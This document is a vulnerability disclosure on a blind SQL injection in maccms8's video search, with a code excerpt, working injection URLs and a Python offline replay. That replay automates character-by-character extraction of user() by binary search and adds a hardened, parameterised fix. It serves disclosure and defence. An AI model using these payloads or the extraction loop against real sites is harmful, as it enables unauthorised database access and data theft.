### Summary: 苹果cms8 (maccms8) blind SQL injection

### Details:

module/vod.php, lines 154-176:

```php
        $tpl->P["des"] = $tpl->P["des"] . " Tag为" . $tpl->P["tag"];
        $tpl->P["where"] = $tpl->P["where"] . " AND instr(d_tag,'".$tpl->P['tag']."')>0 ";
    }
    $tpl->P['typepid'] = 0;
    if(!isN($tpl->P["typeid"])){
        $typearr = $MAC_CACHE['vodtype'][$tpl->P['typeid']];
        if (is_array($typearr)){
            $tpl->P['typepid'] = $typearr['t_pid'];
            if (isN($tpl->P["key"])){
                $tpl->P["key"]= $typearr["t_name"];
            }
            $tpl->P["des"] = $tpl->P["des"] . " 分类为" . $typearr["t_name"];
            $tpl->P["where"] = $tpl->P["where"] . " AND d_type in (" . $typearr["childids"] . ") ";
        }
        unset($typearr);
    }
    if(!isN($tpl->P["classid"])){
        $classarr = $MAC_CACHE['vodclass'][$tpl->P['classid']];
        if (is_array($classarr)){
            if (isN($tpl->P["key"])){
                $tpl->P["key"]= $classarr["c_name"];
            }
            $tpl->P["des"] = $tpl->P["des"] . " 剧情分类为" . $classarr["c_name"];
            $tpl->P["where"] = $tpl->P["where"] . ' AND instr(d_class,\','.$tpl->P['classid'].',\')>0 ';
        }
```

We found that `$tpl->P["where"] = $tpl->P["where"] . ...` here appends to the WHERE clause directly, with no filtering of the URL-controlled `where` parameter. Because 360safe is in place, a UNION SELECT type of query cannot be used, so we try blind guessing instead. An ordinary video site has initial data; our test site has none, so we insert one record into the database:

![1.png](https://images.seebug.org/upload/201408/28223927b0bbbbad8be7a6c3ffedb150752df57f.png)

We send a URL like this:

`http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and 0%23.html`

When the injected condition is 0 (false) the page shows 0 records; by default it shows 1 record. The `%23` (`#`) that closes the payload is a MySQL comment, so whatever vod.php appends after the `where` parameter is discarded. Each such URL therefore answers one yes/no question, and we can guess data this way, as shown:

![2.png](https://images.seebug.org/upload/201408/2822434899067b138c67be4dda0f1e6cd56261f1.png)

![3.png](https://images.seebug.org/upload/201408/2822440027e631b254704b0b01b47a0f23e7676b.png)

![4.png](https://images.seebug.org/upload/201408/2822441114d4c3457bd7a4f9e7929ea0c3e7f114.png)

`http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-sdsdsd-typeid-1-classid-32-where- and if(ascii(substr(user(),1,1))=$NUM,1,0)%23.html`

Stepping `$NUM` through the possible character codes, and the `substr()` offset along the string, then recovers database information such as the current user.

### Proof of vulnerability:
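The row-count oracle described above, replayed offline as an added example (not code from the original report or from the maccms8 project). An in-memory SQLite table stands in for MySQL's `mac_vod`, `vulnerable_query()` rebuilds the WHERE clause the way the vod.php code above splices in the URL-supplied `where` parameter, and the number of records returned is the yes/no signal. Assumptions: the value of `user()`, the `ascii()` emulation and the single seeded row are constructed for the demo; payloads end in `-- ` instead of the `%23` (`#`) used in the URLs above because SQLite has no `#` comment (MySQL accepts both); and the bare comparison `ascii(substr(user(),1,1))>N` is used, which inside `AND` is equivalent to the report's `if(...,1,0)` wrapper. The example goes beyond the report in two ways: it binary-searches the character code (7 requests per character instead of one per candidate value) and puts a hardened query builder beside the vulnerable one.

```python
"""Offline replay of the maccms8 vod-search blind SQL injection.

Added example, not code from the original report or the maccms8 project.
An in-memory SQLite table stands in for MySQL's mac_vod; user() and ascii()
are emulated (assumed values) and the single row is the record the report
seeds by hand.  Payloads end in "-- " rather than "#" because SQLite has no
"#" comment; MySQL accepts both.
"""
import sqlite3

db = sqlite3.connect(":memory:")
db.create_function("user", 0, lambda: "root@localhost")          # assumed MySQL user()
db.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)  # MySQL: ascii('') == 0
db.execute("CREATE TABLE mac_vod (d_id INTEGER, d_name TEXT, d_tag TEXT, d_type INTEGER, d_class TEXT)")
db.execute("INSERT INTO mac_vod VALUES (1, 'demo', 'demo', 1, ',32,')")  # constructed seed row


def vulnerable_query(params):
    """WHERE clause assembled the way module/vod.php does it: the URL-supplied
    `where` goes in verbatim and the tag/classid filters are appended unescaped."""
    where = params.get("where", "")
    if params.get("tag"):
        where += " AND instr(d_tag,'" + params["tag"] + "')>0 "
    if params.get("classid"):
        where += " AND instr(d_class,'," + params["classid"] + ",')>0 "
    return "SELECT d_id FROM mac_vod WHERE 1=1 " + where + " ORDER BY d_id DESC"


def page_rows(params):
    """Number of records the search page would list for these URL parameters."""
    return len(db.execute(vulnerable_query(params)).fetchall())


def blind_extract(expression, max_len=64):
    """Recover the string value of a SQL expression through the row-count oracle.

    Each request asks one question: does the page still list the seeded record
    when `and ascii(substr(expr,pos,1))>mid` is injected?  A binary search over
    0..127 settles each character in 7 requests.  Past the end of the string
    substr() yields '' and ascii('') is 0, which ends the loop.
    Returns (recovered_value, number_of_requests)."""
    requests = 0
    value = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: lo <= ascii(char) <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            where = f" and ascii(substr({expression},{pos},1))>{mid}-- "
            requests += 1
            if page_rows({"classid": "32", "where": where}) > 0:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        value += chr(lo)
    return value, requests


def hardened_query(params):
    """Fix: no caller-supplied SQL fragment at all, and the legitimate filters
    are bound as parameters instead of being spliced into the string."""
    sql = "SELECT d_id FROM mac_vod WHERE 1=1"
    args = []
    if params.get("tag"):
        sql += " AND instr(d_tag, ?) > 0"
        args.append(params["tag"])
    if params.get("classid"):
        if not params["classid"].isdigit():
            raise ValueError("classid must be an integer id")
        sql += " AND instr(d_class, ?) > 0"
        args.append("," + params["classid"] + ",")
    return sql + " ORDER BY d_id DESC", args


def hardened_rows(params):
    """Same search, with the `where` URL parameter ignored and filters bound."""
    sql, args = hardened_query(params)
    return len(db.execute(sql, args).fetchall())


if __name__ == "__main__":
    print("baseline rows:", page_rows({"classid": "32"}))
    print("'and 0' rows:", page_rows({"classid": "32", "where": " and 0-- "}))
    print("user() via blind extraction:", blind_extract("user()"))
    print("hardened, same payload:", hardened_rows({"classid": "32", "where": " and 0-- "}))
```

Against the stand-in, `page_rows` returns 1 for the plain search and 0 once ` and 0-- ` is injected, exactly the 1-record / 0-record difference the screenshots above rely on, and `blind_extract("user()")` recovers the assumed `root@localhost` in 105 requests (14 characters plus the terminating position, 7 requests each). `hardened_rows` returns 1 for the same payload because the `where` parameter never reaches the SQL; a quote-laden `tag` simply matches nothing.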